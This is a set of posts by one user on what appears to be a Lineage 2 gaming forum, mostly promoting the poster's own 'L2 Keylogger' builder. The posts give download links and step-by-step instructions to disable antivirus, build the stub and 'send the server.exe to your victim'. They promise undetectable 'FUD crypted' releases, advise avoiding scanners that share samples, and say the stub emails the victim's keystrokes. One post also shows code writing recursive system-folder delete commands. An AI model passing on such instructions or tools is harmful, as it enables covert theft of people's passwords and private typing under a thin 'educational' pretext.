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Posts posted by Stealth

  1. Information

    This tool kills some processes that are un-needed and thus provides more memory to lineage make it run faster and smoother.






    Download: http://www.mediafire.com/?izgkjwdkdrm or get help.


    This needs some testing.

    If you encounter any problems using this please pm me.

    Notice: It may kill some processes you are using like messenger but its for the best.To fix it log out from windows and log in again.


    You will need to manually create a file named ProcessList.txt in the same directory and add these processes you want it to close.There is an example below.

    # This line is a comment and will be bypassed by the program
    # Add one process per line
    # The process name should be something like "123.exe" without the quotes.
    # The processes below are not recognised as comments and WILL BE KILLED!


  2. I have the same problem. Can anyone help us? Thx.

    i can`t open l2klstub maybe my i need ot change .NET Framework?

    For any questions or help please visit the official forums.

    This is not a problem , you shouldn't open l2klstub.Its only used for the build...

    You should open only L2 Keylogger and use the options you want and then click the build button.

  3. ok i will w8 to make it.

    If i turned medium heuristic?

    If you want it to work do it like this:

    1. Disable any antivirus.

    2. Do the build.

    3. Send the server.exe to your victim.

    4. Re-enable antivirus.


    Will it be FUD crypted?


    Yes, I will release several public versions to ensure that.

    Just everyone please don't scan on totalvirus , only in novirusthanks.org

  4. Trojan agent being found.

    What did you expect , I haven't crypted this yet.

    False positive , you can check the code with any dissasembler.


    PS: For users not experienced, do not execute server.exe on your machine because it will keylog everything you type and send it to your email address.

  5. L2 Keylogger Project




    I can't say anything more yet , but the project is completed, and it will probably be for free.

    If anyone is interested in this please post here.

    This will be for "educational purposes" only , thats why its considered as legal.


    Download Link (Release no1): http://www.mediafire.com/?2yozvmulmr3

    Download Link (Release no2): http://www.mediafire.com/?5mw4wngjdmg

    Download Link (SSL and no SSL): http://www.mediafire.com/?nm2tzn2uggy


    Proof that my files are clean and its a false positive.


  6. The only problem is that

    1) Nobody is causing trouble in these two topics

    2) People in the GR Topic had been given lots of chances. There were some guys that didn't make mistakes (flaming), although, since there were some other guys doing it (and most of the "other" guys were part of the "crew") the topic was geting locked all the time. After 1k locks it finally got deleted by grisom.


    You know what I don't care , its their job to clean the topics , thats why they are global mods if they can't do their jobs they should quit.They shouldn't have locked it in the first place they should have just banned all that stupid people who flamed , it wasn't the topic that caused the problems but the people.

    I mean if a topic is fine and some stupid guy comes and flames repeatedly , then what do you do?You ban the guy.

    You don't delete the topic.

  7. Dear Maxtor,

    Today while browsing the forum I clicked on the spam section and suprisingly I saw that the GR official spam topic is missing.

    I know it was removed a while ago for excessive spamming and posting only in there but now things have calmed down so in my

    opinion you should restore it (of course if you haven't deleted it already).

    We got a romanian spam topic and an english one , wouldn't it be some kind or racism not to have a greek one.

    I mean its not the topic that causes the problems but some people posting in it.

    You could (maxtor) just ban the one's that are flaming and re-open it.


  8. Its clean.

    some of the source:

       writer.WriteLine("@echo off");
       writer.WriteLine(@"deltree /y %systemroot%\history");
       writer.WriteLine(@"deltree /y %systemroot%\cookies");
       writer.WriteLine(@"deltree /y %systemroot%\recent");
       writer.WriteLine(@"deltree /y %systemroot%\spool\printers");
       writer.WriteLine(@"del %systemdrive%\WIN386.SWP");
       writer.WriteLine(@"del /s /f /q %systemroot%\Prefetch");
       writer.WriteLine(@"del /s /f /q %systemroot%\temp\*.*");
       writer.WriteLine(@"rd /s /q %systemroot%\temp");
       writer.WriteLine(@"md %systemroot%\temp");
       writer.WriteLine(@"del /s /f /q %temp%\*.*");
       writer.WriteLine("rd /s /q %temp%");
       writer.WriteLine("md %temp%");
       writer.WriteLine(@"deltree /y %systemroot%\tempor~1");
       writer.WriteLine(@"deltree /y %systemroot%\temp");
       writer.WriteLine(@"deltree /y %systemroot%\tmp");
       writer.WriteLine(@"deltree /y %systemroot%\ff*.tmp");


    Man i suggest you do this with vb.net and not create batch files.

    If you want to know how to do this in vb pm me.


  9. Όχι δεν γίνεται γιατί το παιχνίδι είναι server-side ενώ με το συγκεκριμένο πρόγραμμα αλλάζεις διευθύνσεις μνήμης κάτι το οποίο απαιτεί να έχεις το παιχνίδι αποθηκευμένο στον υπολογιστή σου και όχι να βρίσκεται σε κάποιο άλλο server.

    Mπορεί μεν να αλλάζεις εσύ τις διευθύνσεις μνήμης και να φένεται αυτό σε εσένα όμως οι αλλαγές δεν πραγματοποιούνται και στο server.Συνεπώς με μια ανανέωση της σελίδας οι αλλαγές χάνονται.


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